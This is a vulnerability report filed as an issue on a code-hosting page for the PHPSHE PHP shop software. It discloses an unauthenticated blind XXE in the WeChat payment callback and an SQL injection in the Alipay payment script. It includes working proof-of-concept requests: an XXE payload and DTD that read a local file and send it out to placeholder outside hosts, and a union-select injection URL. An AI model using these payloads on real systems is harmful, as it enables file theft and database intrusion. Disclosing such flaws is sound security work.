本周六「上海源创会」,与一线大牛一起聊聊:PHP、Flink、k8s、微服务架构,点击立刻报名!
Watch 14 Star 34 Fork 18

koyshe / phpshePHP

Two vulnerabiliyies without authentication

待办的
wps2015  创建于

0x01 blind XXE in /include/plugin/payment/wechat/notify_url.php

The XXE vulnerability is located in include/plugin/payment/wechat/notify_url.php, wechat_getxml function is called.
输入图片说明

wechat_getxml function is defined in hook/wechat.hook.php ,then pe_getxmlfunction is called.

输入图片说明

pe_getxml function is defined in include/function/global.func.php。simplexml_load_string() function is called to parse the xml from php://input. If the version of libxml lib < 2.9.0, simplexml_load_string() will parse the external entity in the default mod.

输入图片说明

the poc is as below:

/phpshe1.7/include/plugin/payment/wechat/notify_url.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
...
Content-Type: application/xml
Content-Length: 257

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE roottag [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///c:/windows/win.ini">
<!ENTITY % dtd SYSTEM "http://yoursite.com/test.dtd">
%dtd;
]>
<roottag>&send;</roottag>

test.dtd:

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://dnslog.com/?%file;'>">
%all;

We can use it to read any file in the system.

0x02 SQL Injection in include/plugin/payment/alipay/pay.php with parameter id

The vulnerability is located in include/plugin/payment/alipay/pay.php and $order_id can be controlled.

输入图片说明

Then the renturn value of order_table will be directly spliced into SQL statements as table name.

输入图片说明

So the poc is as below:

/include/plugin/payment/alipay/pay.php?id=pay`%20where%201=1%20union%20select%201,2,user(),4,5,6,7,8,9,10,11,12%23_

输入图片说明

共1人参与

评论 (0)

登录 后才可以发表评论

负责人
标签
未设置
里程碑
关联分支
开始时间
未设置
结束时间
未设置
置顶选项
优先级

搜索帮助

14_float_left_people 14_float_left_close